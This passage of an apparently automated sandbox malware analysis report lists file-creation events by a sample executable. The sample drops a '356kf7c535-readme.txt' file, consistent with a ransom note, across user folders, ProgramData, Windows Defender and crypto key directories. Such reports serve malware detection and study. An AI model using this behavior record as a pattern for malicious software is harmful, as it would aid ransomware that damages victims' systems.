        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\default\documents\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\default\downloads\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\default\favorites\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\default\links\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\default\music\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\default\pictures\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\default\saved games\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\default\videos\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\user\3d objects\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\user\contacts\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\user\desktop\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\user\documents\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\user\downloads\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\user\favorites\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\user\links\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\user\music\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\user\onedrive\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\user\pictures\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\user\recent\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\user\saved games\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\user\searches\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\user\videos\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\public\accountpictures\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\public\desktop\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\public\documents\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\public\downloads\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\public\libraries\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\public\music\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\public\pictures\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\public\videos\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\adobe\arm\reader_18.011.20055\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\adobe\arm\s\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\adobe\arm\{291aa914-a987-4ce9-bd63-ac0a92d435e5}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\adobe\setup\{ac76ba86-7ad7-1033-7b44-ac0f074e4100}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\appv\setup\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\clicktorun\machinedata\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\clicktorun\productreleases\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\clicktorun\userdata\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\clicktorun\{9ac08e99-230b-47e8-9721-4577b7f124ea}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\crypto\dss\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\crypto\keys\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\crypto\pcpksp\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\crypto\rsa\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\crypto\systemkeys\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\device stage\device\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\device stage\task\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\asimovuploader\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\customtraceprofiles\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\downloadedscenarios\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\downloadedsettings\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\etllogs\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\eventtranscript\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\feedbackhub\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\localtracestore\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\offlinesettings\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\scripts\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\sideload\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\siufloc\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\softlanding\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\softlandingstage\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\tenantstorage\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\windowsanalytics\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\drm\server\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\event viewer\views\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\identitycrl\int\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\identitycrl\production\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\netframework\breadcrumbstore\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\network\connections\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\network\downloader\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\assetcache\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\search\data\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\settings\accounts\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\smsrouter\messagestore\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\speech_onecore\sr\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\uev\inboxtemplates\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\uev\scripts\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\uev\templates\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\clean store\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\definition updates\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\features\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\localcopy\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\network inspection system\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\platform\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\quarantine\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\scans\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\support\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender advanced threat protection\cache\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender advanced threat protection\cyber\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender advanced threat protection\temp\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender advanced threat protection\trace\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\msfax\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\msscan\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows security health\health advisor\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows security health\logs\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\winmsipc\server\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\wwansvc\dmprofiles\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\wwansvc\profiles\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\oracle\java\installcache\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoft3dviewer_8wekyb3d8bbwe\s-1-5-21-58933367-3072710494-194312298-1002\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoft3dviewer_8wekyb3d8bbwe\s-1-5-21-58933367-3072710494-194312298-1003\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoftofficehub_8wekyb3d8bbwe\s-1-5-21-58933367-3072710494-194312298-1002\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoftofficehub_8wekyb3d8bbwe\s-1-5-21-58933367-3072710494-194312298-1003\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\s-1-5-21-58933367-3072710494-194312298-1002\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\s-1-5-21-58933367-3072710494-194312298-1003\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\desktop\curqnkvoix\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\desktop\fenivhoikn\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\desktop\ipkgelntqy\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\desktop\jsdngycowy\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\desktop\kzwfnrxyki\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\desktop\mxpxcvpdvn\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\documents\20200719\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\documents\curqnkvoix\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\documents\fenivhoikn\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\documents\ipkgelntqy\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\documents\jsdngycowy\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\documents\kzwfnrxyki\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\documents\mxpxcvpdvn\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\favorites\links\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\adobe\arm\s\18392\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\adobe\arm\s\20227\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\machinedata\catalog\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\machinedata\integration\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\productreleases\a605f2a5-9d01-4691-9fdc-be6391d70203\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\crypto\dss\machinekeys\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\crypto\pcpksp\windowsaik\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\crypto\rsa\machinekeys\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\crypto\rsa\s-1-5-18\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\device stage\device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\device stage\device\{8702d817-5aad-4674-9ef3-4d3decd87120}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\device stage\task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\device stage\task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\etllogs\autologger\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\etllogs\scenarioshutdownlogger\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\etllogs\shutdownlogger\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\tenantstorage\p-aria\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\event viewer\views\applicationviewsrootnode\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\identitycrl\production\temp\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\assetcache\cellularux\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\search\data\applications\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\search\data\temp\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\speech_onecore\sr\sv10-ev100\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\definition updates\backup\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\definition updates\default\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\definition updates\nisbackup\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\definition updates\updates\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\definition updates\{f76193f4-804d-487e-84b3-ef6fc382142d}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\network inspection system\support\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\platform\4.18.1806.18062-0\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\scans\backupstore\356kf7c535-readme.txtJump to behavior
